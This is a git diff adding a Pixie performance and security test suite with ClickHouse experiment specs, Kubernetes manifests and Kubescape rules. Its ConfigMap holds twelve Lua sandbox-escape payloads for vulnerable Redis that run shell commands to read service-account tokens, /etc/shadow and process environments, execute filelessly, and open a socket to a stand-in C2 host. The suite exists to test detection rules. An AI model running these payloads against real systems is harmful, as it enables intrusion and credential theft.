HTTPLoadTestExperiment( dur time.Duration, ) *experimentpb.ExperimentSpec { e := &experimentpb.ExperimentSpec{ - VizierSpec: VizierWorkload(), + VizierSpec: VizierReleaseWorkload(), WorkloadSpecs: []*experimentpb.WorkloadSpec{ HTTPLoadTestWorkload(numConnections, targetRPS, true), }, @@ -347,6 +347,132 @@ func HTTPLoadApplicationOverheadExperiment( return e } +// ClickHouseExportExperiment drives load against Pixie's ClickHouse export +// path. An HTTP loadtest populates http_events on the PEMs, and the +// clickhouse_export PxL script runs on a tight period to continuously export +// a windowed slice of http_events to ClickHouse. +func ClickHouseExportExperiment( + numConnections int, + targetRPS int, + metricPeriod time.Duration, + exportPeriod time.Duration, + exportWindow time.Duration, + clickhouseDSN string, + clickhouseTable string, + predeployDur time.Duration, + dur time.Duration, +) *experimentpb.ExperimentSpec { + e := &experimentpb.ExperimentSpec{ + VizierSpec: VizierWorkload(), + WorkloadSpecs: []*experimentpb.WorkloadSpec{ + HTTPLoadTestWorkload(numConnections, targetRPS, true), + }, + MetricSpecs: []*experimentpb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the second query a little bit because of query stability issues. + HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseExportLoadMetric(exportPeriod, clickhouseDSN, clickhouseTable, clickhouseTable, exportWindow), + ClickHouseOperatorMetrics(metricPeriod), + }, + RunSpec: &experimentpb.RunSpec{ + Actions: []*experimentpb.ActionSpec{ + { + Type: experimentpb.START_VIZIER, + }, + { + Type: experimentpb.START_METRIC_RECORDERS, + }, + { + Type: experimentpb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + Type: experimentpb.START_WORKLOADS, + }, + { + Type: experimentpb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: experimentpb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/clickhouse-export", + fmt.Sprintf("parameter/num_conns/%d", numConnections), + fmt.Sprintf("parameter/target_rps/%d", targetRPS), + fmt.Sprintf("parameter/export_window/%s", exportWindow), + ) + return e +} + +// ClickHouseReadExperiment drives load against Pixie's ClickHouse read path. +// HTTP loadtest populates http_events; a (placeholder) read-load workload +// drives sustained pressure against ClickHouse; the clickhouse_read PxL +// script periodically queries the ClickHouse source from Pixie so we can +// observe Pixie-side read performance as well. +func ClickHouseReadExperiment( + numConnections int, + targetRPS int, + metricPeriod time.Duration, + readPeriod time.Duration, + readWindow time.Duration, + clickhouseDSN string, + clickhouseTable string, + predeployDur time.Duration, + dur time.Duration, +) *experimentpb.ExperimentSpec { + e := &experimentpb.ExperimentSpec{ + VizierSpec: VizierWorkload(), + WorkloadSpecs: []*experimentpb.WorkloadSpec{ + HTTPLoadTestWorkload(numConnections, targetRPS, true), + ClickHouseReadLoadWorkload(), + }, + MetricSpecs: []*experimentpb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the second query a little bit because of query stability issues. + HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseReadLoadMetric(readPeriod, clickhouseDSN, clickhouseTable, readWindow), + ClickHouseOperatorMetrics(metricPeriod), + }, + RunSpec: &experimentpb.RunSpec{ + Actions: []*experimentpb.ActionSpec{ + { + Type: experimentpb.START_VIZIER, + }, + { + Type: experimentpb.START_METRIC_RECORDERS, + }, + { + Type: experimentpb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + Type: experimentpb.START_WORKLOADS, + }, + { + Type: experimentpb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: experimentpb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/clickhouse-read", + fmt.Sprintf("parameter/num_conns/%d", numConnections), + fmt.Sprintf("parameter/target_rps/%d", targetRPS), + fmt.Sprintf("parameter/read_window/%s", readWindow), + ) + return e +} + func addTags(e *experimentpb.ExperimentSpec, tags ...string) *experimentpb.ExperimentSpec { if e.Tags == nil { e.Tags = []string{} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-backend.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-backend.yaml new file mode 100644 index 00000000000..4ca461d9286 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-backend.yaml @@ -0,0 +1,190 @@ +# api — tier 2 (HTTP API) glueing the loadgen's HTTP traffic to redis +# (cache) + postgres (truth). Flask + gunicorn for concurrency. Each +# inbound request hits at least one Pixie-monitored protocol: +# +# GET /api/item/{id} → redis_events (cache lookup) +# → pgsql_events (only on cache miss) +# → redis_events (cache populate on miss) +# POST /api/event → pgsql_events (INSERT) +# → redis_events (cache invalidate DEL) +# GET /healthz → http_events only (loadgen sanity) +# +# Plus the api↔redis and api↔postgres connection establishment goes +# through cluster DNS, producing dns_events on the kube-dns pods. +# +# App code + requirements are mounted via ConfigMap so this is buildless — +# python:3.12-slim pip-installs flask/redis/psycopg2 on startup (~25 s +# one-shot cost; the gunicorn process then runs for the duration of the +# experiment). +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: api-backend-src + namespace: redis + labels: + app.kubernetes.io/name: api + app.kubernetes.io/part-of: sovereign-soc +data: + requirements.txt: | + flask==3.0.3 + gunicorn==22.0.0 + redis==5.0.7 + psycopg2-binary==2.9.9 + app.py: | + import logging + import os + import random + import time + from flask import Flask, jsonify, request + import redis + import psycopg2 + from psycopg2.pool import ThreadedConnectionPool + + log = logging.getLogger("api") + logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s") + + REDIS_HOST = os.environ.get("REDIS_HOST", "redis") + REDIS_PORT = int(os.environ.get("REDIS_PORT", "6379")) + PG_DSN = os.environ.get( + "PG_DSN", + "host=postgres port=5432 dbname=appdb user=app password=app_password connect_timeout=5", + ) + CACHE_TTL = int(os.environ.get("CACHE_TTL", "30")) + + # Wait for backends with a tight retry loop — the loadgen pod may + # outrace postgres readiness. + def _wait(fn, label, attempts=60): + for i in range(attempts): + try: + fn() + log.info("%s ready", label) + return + except Exception as e: + log.info("waiting for %s (%d/%d): %s", label, i + 1, attempts, e) + time.sleep(2) + raise RuntimeError(f"{label} never became reachable") + + r = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, socket_connect_timeout=2) + _wait(lambda: r.ping(), f"redis@{REDIS_HOST}:{REDIS_PORT}") + + pg_pool = None + def _open_pool(): + global pg_pool + pg_pool = ThreadedConnectionPool(minconn=2, maxconn=16, dsn=PG_DSN) + _wait(_open_pool, "postgres pool") + + app = Flask(__name__) + + @app.get("/healthz") + def healthz(): + return "ok", 200 + + @app.get("/api/item/") + def get_item(item_id): + key = f"item:{item_id}" + cached = r.get(key) + if cached is not None: + return jsonify({"id": item_id, "data": cached.decode(), "cache": True}) + conn = pg_pool.getconn() + try: + with conn.cursor() as cur: + cur.execute("SELECT data FROM items WHERE id = %s", (item_id,)) + row = cur.fetchone() + finally: + pg_pool.putconn(conn) + if row is None: + return jsonify({"error": "not found", "id": item_id}), 404 + r.setex(key, CACHE_TTL, row[0]) + return jsonify({"id": item_id, "data": row[0], "cache": False}) + + @app.post("/api/event") + def post_event(): + payload = request.get_data(as_text=True) or "{}" + conn = pg_pool.getconn() + try: + with conn.cursor() as cur: + cur.execute("INSERT INTO events (payload) VALUES (%s) RETURNING id", (payload,)) + eid = cur.fetchone()[0] + conn.commit() + finally: + pg_pool.putconn(conn) + # Bust a small set of cache keys to keep the cache layer churning. + for kid in random.sample(range(1, 101), 3): + r.delete(f"item:{kid}") + return jsonify({"id": eid}), 201 +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: api + namespace: redis + labels: + app.kubernetes.io/name: api + app.kubernetes.io/part-of: sovereign-soc +spec: + replicas: 2 + selector: + matchLabels: + app.kubernetes.io/name: api + template: + metadata: + labels: + app.kubernetes.io/name: api + app.kubernetes.io/part-of: sovereign-soc + # Pairs with api-sbob.yaml's `api-empty` profile so kubescape + # alerts from t=0. See feedback_kubescape_empty_profile. + kubescape.io/user-defined-profile: api-empty + spec: + containers: + - name: api + image: python:3.12-slim + imagePullPolicy: IfNotPresent + command: ["/bin/sh", "-c"] + args: + - | + set -e + cp /src/app.py /app/app.py + cp /src/requirements.txt /app/requirements.txt + pip install --no-cache-dir --root-user-action=ignore -r /app/requirements.txt + cd /app + exec gunicorn -w 4 -k gthread --threads 16 -b 0.0.0.0:8080 \ + --access-logfile - --access-logformat '%(h)s %(r)s %(s)s %(b)s %(L)ss' \ + app:app + env: + - {name: REDIS_HOST, value: redis} + - {name: REDIS_PORT, value: "6379"} + - {name: PG_DSN, value: "host=postgres port=5432 dbname=appdb user=app password=app_password connect_timeout=5"} + ports: + - {name: http, containerPort: 8080} + volumeMounts: + - {name: src, mountPath: /src} + - {name: workdir, mountPath: /app} + resources: + requests: {cpu: 200m, memory: 256Mi} + limits: {cpu: "2", memory: 1Gi} + readinessProbe: + httpGet: {path: /healthz, port: http} + initialDelaySeconds: 30 + periodSeconds: 5 + timeoutSeconds: 3 + failureThreshold: 24 + volumes: + - name: src + configMap: {name: api-backend-src} + - name: workdir + emptyDir: {} +--- +apiVersion: v1 +kind: Service +metadata: + name: api + namespace: redis + labels: + app.kubernetes.io/name: api + app.kubernetes.io/part-of: sovereign-soc +spec: + selector: + app.kubernetes.io/name: api + ports: + - {name: http, port: 8080, targetPort: http} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-sbob.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-sbob.yaml new file mode 100644 index 00000000000..18f4e2828ef --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-sbob.yaml @@ -0,0 +1,20 @@ +--- +# Empty user-defined ApplicationProfile for the api-backend container. See +# redis-sbob.yaml for the rationale; same pattern, container name `api` +# matches api-backend.yaml. +apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1 +kind: ApplicationProfile +metadata: + name: api-empty + namespace: redis +spec: + architectures: + - amd64 + containers: + - name: api + capabilities: null + endpoints: null + execs: null + opens: null + syscalls: null + rulePolicies: {} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml new file mode 100644 index 00000000000..03a10f0dab8 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml @@ -0,0 +1,377 @@ +# Pinned copy of upstream k8sstormcenter/bob@68fbfb83dc63f4e0184ecbf66d9c5f251a74b0b7 +# example/redis-attacks.yaml (Apache-2.0 licensed), wrapped as a ConfigMap so +# the bobctl-attack Job can mount it at /suite/redis-attacks.yaml. The bobctl +# CLI consumes this file via its --attack-suite flag (it is NOT a Kubernetes +# CRD, it is a bobctl-internal manifest). +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: bob-suite-attack + namespace: redis +data: + redis-attacks.yaml: | + apiVersion: bobctl.k8sstormcenter.io/v1alpha1 + kind: AttackSuite + metadata: + name: redis-full-attack-suite + description: >- + Comprehensive Redis attack suite (12 attacks) targeting a vulnerable + Redis 7.2.10 instance with CVE-2022-0543 (Lua sandbox escape via + package.loadlib / io.popen). Each attack has inline expectedDetections + for precise per-attack alert attribution via the AlertLedger. + target: + service: redis + namespace: redis + port: 6379 + protocol: redis + + attacks: + # ─── Attack 1: Fileless Execution via memfd_create (R1005) ─────────────── + - name: fileless-memfd-exec + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local cmd = "perl -e 'my $n=\"bob\\0\";my $fd=syscall(319,$n,0);die if $fd<0;open(my $s,\"<:raw\",\"/bin/cat\");open(my $d,\">&=\",$fd);binmode $d;my $b;while(read($s,$b,8192)){print $d $b}close $s;exec{\"/proc/self/fd/$fd\"}\"cat\",\"/etc/hostname\"'" + local f = io_mod.popen(cmd) + if not f then return 'popen_failed' end + local out = f:read('*a') + f:close() + return 'fileless:' .. out + successIndicators: + - responseContains: "fileless:" + expectedDetections: + - attackType: fileless + ruleID: R1005 + ruleName: "Fileless execution detected" + containerName: redis + + # ─── Attack 2: SA Token Exfiltration (R0006) ──────────────────────────── + - name: sa-token-exfil + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || echo no_token') + local out = f:read('*a') + f:close() + return out + successIndicators: + - responseContains: "eyJ" + expectedDetections: + - attackType: fileless + ruleID: R0006 + ruleName: "Unexpected service account token access" + containerName: redis + command: cat + + # ─── Attack 3: Sensitive File Access /etc/shadow (R0010) ───────────────── + - name: read-etc-shadow + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /etc/shadow 2>&1; echo shadow_attempted') + local out = f:read('*a') + f:close() + return 'shadow:' .. out + successIndicators: + - responseContains: "shadow_attempted" + expectedDetections: + - attackType: fileless + ruleID: R0010 + ruleName: "Unexpected Sensitive File Access" + containerName: redis + command: cat + + # ─── Attack 4: Unexpected Process - whoami (R0001) ─────────────────────── + - name: unexpected-process-whoami + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('whoami') + local out = f:read('*a') + f:close() + return 'user:' .. out + successIndicators: + - responseContains: "user:" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: whoami + + # ─── Attack 5: DNS Anomaly - resolve evil domain (R0005) ───────────────── + - name: dns-anomaly-evil-domain + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('getent hosts evil.attacker.example.com 2>&1 || echo dns_done') + local out = f:read('*a') + f:close() + return 'dns:' .. out + successIndicators: + - responseContains: "dns:" + expectedDetections: + - attackType: fileless + ruleID: R0005 + ruleName: "DNS Anomalies in container" + containerName: redis + + # ─── Attack 6: Drifted Binary Execution (R1001) ───────────────────────── + - name: drifted-binary-exec + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cp /bin/ls /tmp/drifted_redis && /tmp/drifted_redis /etc 2>&1; rm -f /tmp/drifted_redis') + local out = f:read('*a') + f:close() + return 'drifted:' .. out + successIndicators: + - responseContains: "drifted:" + expectedDetections: + - attackType: fileless + ruleID: R1001 + ruleName: "Drifted process executed" + containerName: redis + command: drifted_redis + + # ─── Attack 7: Execution from /dev/shm (R1000) ────────────────────────── + - name: exec-from-devshm + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cp /bin/echo /dev/shm/malicious && /dev/shm/malicious pwned 2>&1; rm -f /dev/shm/malicious') + local out = f:read('*a') + f:close() + return 'shm:' .. out + successIndicators: + - responseContains: "shm:" + expectedDetections: + - attackType: fileless + ruleID: R1000 + ruleName: "Process executed from malicious source" + containerName: redis + + # ─── Attack 8: Read /proc/*/environ (R0008) ───────────────────────────── + - name: read-proc-environ + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /proc/1/environ 2>/dev/null | tr "\\0" "\\n" | head -3 || echo no_environ') + local out = f:read('*a') + f:close() + return 'environ:' .. out + successIndicators: + - responseContains: "environ:" + expectedDetections: + - attackType: fileless + ruleID: R0008 + ruleName: "Read Environment Variables from procfs" + containerName: redis + command: cat + + # ─── Attack 9: Symlink over /etc/shadow (R1010) ───────────────────────── + - name: symlink-etc-shadow + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('ln -sf /etc/shadow /tmp/shadow_link 2>&1 && cat /tmp/shadow_link 2>/dev/null; rm -f /tmp/shadow_link') + local out = f:read('*a') + f:close() + return 'symlink:' .. out + successIndicators: + - responseContains: "symlink:" + expectedDetections: + - attackType: fileless + ruleID: R1010 + ruleName: "Soft link created over sensitive file" + containerName: redis + + # ─── Attack 10: Crypto Mining Domain DNS (R1008) ──────────────────────── + - name: crypto-mining-dns + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('getent hosts xmr.pool.minergate.com 2>&1 || echo mining_dns_done') + local out = f:read('*a') + f:close() + return 'mining_dns:' .. out + successIndicators: + - responseContains: "mining_dns:" + expectedDetections: + - attackType: fileless + ruleID: R1008 + ruleName: "Crypto Mining Domain Communication" + containerName: redis + + # ─── Attack 11: Reverse Shell Attempt via Perl HTTP (R0001 + R0005) ───── + - name: reverse-shell-perl-http + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen("perl -e 'use IO::Socket::INET;my $s=IO::Socket::INET->new(PeerAddr=>\"c2.evil.example.com\",PeerPort=>80,Timeout=>2);print defined $s ? \"connected\" : \"connect_failed\";' 2>&1; echo perl_http_done") + local out = f:read('*a') + f:close() + return 'revshell:' .. out + successIndicators: + - responseContains: "revshell:" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: perl + - attackType: fileless + ruleID: R0005 + ruleName: "DNS Anomalies in container" + containerName: redis + + # ─── Attack 12: Credential Harvesting via /etc/passwd + id (R0001) ────── + - name: credential-harvest-passwd + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen("awk -F: '$3==0{print $1}' /etc/passwd && id 2>&1") + local out = f:read('*a') + f:close() + return 'creds:' .. out + successIndicators: + - responseContains: "creds:root" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: awk diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml new file mode 100644 index 00000000000..10635ccdc02 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml @@ -0,0 +1,153 @@ +# Job that runs bobctl in a tight loop to continuously execute the +# CVE-2025-49844 attack suite against the vulnerable redis deployment. The +# bobctl binary is downloaded at container startup by an init container, so +# no image build is needed. The attack suite YAML is mounted from the +# bob-suite-attack ConfigMap at /suite/redis-attacks.yaml. +# +# bobctl reaches the redis Service via kubectl-port-forward style: +# it queries the apiserver for the Service + a backing Pod, then opens a +# pods/portforward stream to that Pod. The dedicated ServiceAccount + +# Role below grant exactly the verbs required for that flow. +# +# The Job's pod must land in the `redis` namespace (same as the Redis +# Service and Kubescape ApplicationProfile) so the attack traffic is +# recorded against this namespace's profile. +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: bobctl + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: bobctl-port-forward + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +rules: + - apiGroups: [""] + resources: ["services", "pods"] + verbs: ["get", "list"] + - apiGroups: [""] + resources: ["pods/portforward"] + verbs: ["create", "get"] +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: bobctl-port-forward + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: bobctl-port-forward +subjects: + - kind: ServiceAccount + name: bobctl + namespace: redis +--- +apiVersion: batch/v1 +kind: Job +metadata: + name: bobctl-attack + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +spec: + backoffLimit: 100 + ttlSecondsAfterFinished: 600 + template: + metadata: + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc + spec: + restartPolicy: OnFailure + serviceAccountName: bobctl + initContainers: + - name: fetch-bobctl + image: curlimages/curl:8.15.0 + command: + - sh + - -c + - | + set -euo pipefail + curl -fsSL -o /bob/bobctl \ + https://github.com/k8sstormcenter/bob/releases/latest/download/bobctl-linux-amd64 + chmod +x /bob/bobctl + volumeMounts: + - name: bob-bin + mountPath: /bob + containers: + - name: bobctl + image: alpine:3.19 + command: + - sh + - -c + - | + set -u + # bobctl's CLI bootstrap unconditionally tries to read + # ~/.kube/config (it uses kubectl-style proxy routing for + # service targets), so synthesize a minimal in-cluster + # kubeconfig from the pod's service-account mount before + # invoking it. tokenFile is preferred over inline token so + # SA-token rotation works. + mkdir -p /root/.kube + cat > /root/.kube/config <<'EOF' + apiVersion: v1 + kind: Config + clusters: + - name: in-cluster + cluster: + certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt + server: https://kubernetes.default.svc + contexts: + - name: in-cluster + context: + cluster: in-cluster + user: in-cluster + namespace: redis + current-context: in-cluster + users: + - name: in-cluster + user: + tokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token + EOF + # Small gap lets the service DNS entry propagate in very fresh namespaces. + sleep 5 + while true; do + /bob/bobctl attack \ + --attack-suite /suite/redis-attacks.yaml \ + -n redis --format json || true + sleep 5 + done + volumeMounts: + - name: bob-bin + mountPath: /bob + readOnly: true + - name: bob-suite + mountPath: /suite + readOnly: true + resources: + requests: + cpu: 100m + memory: 64Mi + limits: + cpu: 500m + memory: 256Mi + volumes: + - name: bob-bin + emptyDir: {} + - name: bob-suite + configMap: + name: bob-suite-attack diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md new file mode 100644 index 00000000000..4ee6abddd9f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md @@ -0,0 +1,77 @@ +# Helm-rendered Kubescape + Vector manifests for the sovereign-soc suite + +`PrerenderedDeploy` only applies static YAML; it does not invoke helm at +runtime. So the Kubescape and Vector charts used by the Sovereign SOC demo +are pre-rendered once and committed here. The source values files that +went in are also committed so the render is reproducible. + +Sources: + +- `kubescape-values.yaml` — copied verbatim from + [`k8sstormcenter/soc@main:tree/kubescape/values.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/kubescape/values.yaml). +- `kubescape-default-rules.yaml` — copied verbatim from + [`k8sstormcenter/soc@main:tree/kubescape/default-rules.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/kubescape/default-rules.yaml). +- `vector-values.yaml` — based on + [`k8sstormcenter/soc@main:tree/vector-lab/values.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/vector-lab/values.yaml) + with the ClickHouse sink `endpoint:` rewritten to the external forensic + endpoint (`http://clickhouse.forensic.austrianopencloudcommunity.org:8123`) + so Vector can write to CH from any experiment cluster, not just the + forensic cluster's in-cluster DNS. + +## How to re-render + +From inside the dev docker container, with its helm in `$PATH`: + +```sh +helm repo add kubescape https://kubescape.github.io/helm-charts/ +helm repo add vector https://helm.vector.dev +helm repo update + +# Kubescape operator (pinned to the version used by soc/Makefile). +helm template kubescape kubescape/kubescape-operator \ + --version 1.30.2 \ + --namespace honey --create-namespace \ + --values src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml \ + > src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml + +# Split the kube-system-namespaced RoleBinding (storage-auth-reader) into +# its own file, because PrerenderedDeploy only tolerates a single namespace +# per step. +python3 - <<'PY' +import yaml, os +base = "src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered" +with open(f"{base}/kubescape.rendered.yaml") as f: + docs = list(yaml.safe_load_all(f)) +main, ks = [], [] +for d in docs: + if d is None: continue + ns = (d.get("metadata") or {}).get("namespace") + (ks if ns == "kube-system" else main).append(d) +with open(f"{base}/kubescape.rendered.yaml", "w") as f: + yaml.safe_dump_all(main, f, sort_keys=False) +with open(f"{base}/kubescape.rendered.kube-system.yaml", "w") as f: + yaml.safe_dump_all(ks, f, sort_keys=False) +PY + +# Vector (version pinned to whatever's current on the vector repo). +helm template vector vector/vector \ + --namespace honey --create-namespace \ + --values src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml \ + > src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml +``` + +## Why the kube-system split + +The kubescape-operator chart includes a single `RoleBinding` in +`kube-system` — `storage-auth-reader` — that delegates auth checking to +the kube-apiserver's `extension-apiserver-authentication-reader` Role +(required for the storage APIService aggregation to work; without it the +`ApplicationProfile` CRD can't be read, which means node-agent can't +compare workload behavior against the pre-populated redis profile). + +`RoleBinding` objects must reside in the same namespace as the Role they +reference, so we can't rewrite it into `honey`. And +`PrerenderedDeploy.getNamespace()` errors if a single concatenated YAML +touches more than one namespace. We split it into its own step and flag +it `skip_namespace_delete: true` on the proto spec so teardown never +tries to `kubectl delete ns kube-system`. diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml new file mode 100644 index 00000000000..349c704f8a6 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml @@ -0,0 +1,746 @@ +apiVersion: kubescape.io/v1 +kind: Rules +metadata: + name: default-rules + namespace: honey +spec: + rules: + - description: Detects unexpected process launches that are not in the baseline + enabled: true + expressions: + message: >- + 'Unexpected process launched: ' + event.comm + ' with PID ' + + string(event.pid) + ruleExpression: + - eventType: exec + expression: >- + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + uniqueId: event.comm + '_' + event.exepath + id: R0001 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Unexpected process launched + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - process + - exec + - applicationprofile + - description: Detects unexpected file access that is not in the baseline + enabled: true + expressions: + message: >- + 'Unexpected file access detected: ' + event.comm + ' with PID ' + + string(event.pid) + ' to ' + event.path + ruleExpression: + - eventType: open + expression: >- + !ap.was_path_opened(event.containerId, event.path) + uniqueId: event.comm + '_' + event.path + id: R0002 + isTriggerAlert: true + mitreTactic: TA0009 + mitreTechnique: T1005 + name: Files Access Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: true + tags: + - anomaly + - file + - open + - applicationprofile + - description: >- + Detects 